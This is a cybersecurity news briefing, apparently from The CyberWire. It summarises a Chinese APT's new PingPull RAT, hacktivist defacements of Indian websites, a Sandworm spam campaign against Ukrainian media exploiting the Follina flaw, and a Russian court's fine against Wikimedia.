At a glance.
- Chinese APT deploys new RAT.
- Hacktivism roils Indian websites.
- Ukraine reports GRU spam campaign against media outlets.
- Russian court fines Wikimedia for "disinformation" over the war.
Chinese APT deploys new cyberespionage tool.
In a report this morning, Palo Alto Networks' Unit 42 outlines the recent activities of Gallium, a Chinese government threat actor particularly active against selective targets in Australia, Southeast Asia, Africa, and Europe. Gallium has also been associated with Operation Soft Cell, a campaign against telecommunications providers. The recent operations Palo Alto describes are distinguished by their employment of "a new, difficult-to-detect remote access trojan named PingPull." They're also marked by an expansion to sectors other than telecommunications, specifically government organizations and financial services. Palo Alto has shared detailed findings with fellow members of the Cyber Threat Alliance. The company also extends "special thanks to the NSA Cybersecurity Collaboration Center, the Australian Cyber Security Centre and other government partners for their collaboration and insights offered in support of this research."
Hacktivism roils India after politician's remarks about the Prophet.
Remarks by a representative of India's ruling Bharatiya Janata Party (BJP) have prompted a defacement campaign against websites belonging to Indian diplomatic, academic, and agricultural organizations. The actions, organized by the hacktivist group DragonForce Malaysia, are organized around the message, "For you is your religion and for me is my religion." The Times of India quotes Prasad Patibandla, director (research and operations) at the Centre for Research on Cyber Intelligence and Digital Forensics, as saying, correctly, "Website defacement is the lowest form of cyber attack. Data theft, particularly financial data theft and personal data, will impact people and the banking sector." He adds, "Companies and government organisations must step up cybersecurity." The remarks themselves, by Nupur Sharma, were taken by many Muslims, including Muslim governments, to be defamatory, blasphemous.
Ukraine reports a "massive" spam campaign against the country's media organizations.
An email from the Press Office of Ukraine's State Service of Special Communication and Information Protection (SSSCIP) on Saturday warned that a "massive" spam campaign against media outlets had begun:
"The Computer Emergency Response Team of Ukraine (CERT-UA) acting under the SSSCIP warns about mass spamming with dangerous emails titled 'Interactive Map Reference List'. In particular, these emails are targeting media outlets (radio stations, newspapers, news agencies, etc.) of Ukraine. Over 500 destination email addresses have been identified. These emails contain an attached document ... opening which may initiate downloading of CrescentImp malware. Specialists warn that cyber criminals have been increasingly resorting to email spamming from compromised addresses of public institutions. If you fall victim to a cyberattack, please contact the CERT-UA immediately. This activity is tracked by UAC-0113 (attributed to the Sandworm group with a medium certainty level). As reported earlier, this group was involved in orchestrating a massive attack on the energy sector of Ukraine in April."
Sandworm is a Russian threat actor associated (in MITRE's ATT&CK catalogue) with Russia's GRU military intelligence service and perhaps best known for its role in the 2015 and 2016 cyberattacks against sections of Ukraine's power grid. The group has also been fingered for the 2017 NotPetya pseudo-ransomware attack and 2018's Olympic Destroyer incident.
The payload in the spam emails appears to exploit Folllina vulnerability in the Microsoft Windows Support Diagnostic Tool (CVE-2022-30190) to install a downloader for CrescentImp malware, CrescentImp's provenance and functionality are unclear, BleepingComputer reports, but CERT-UA has provided indicators of compromise to assist in CrescentImp's detection.
Russian court fines Wikimedia for "disinformation."
The Verge reports that a Moscow court has fined the Wikimedia Foundation five-million rubles (about $65 thousand) for its reporting on Russia's special military operation, the war against Ukraine. Wikimedia is appealing the fine. Stephen LaPorte, associate general counsel at the Wikimedia Foundation, said, "This decision implies that well-sourced, verified knowledge on Wikipedia that is inconsistent with Russian government accounts constitutes disinformation. The government is targeting information that is vital to people’s lives in a time of crisis. We urge the court to reconsider in favor of everyone’s rights to knowledge access and free expression.” Wikimedia also argues that Russia lacks jurisdiction.
The CyberWire's continuing coverage of the unfolding crisis in Ukraine may be found here.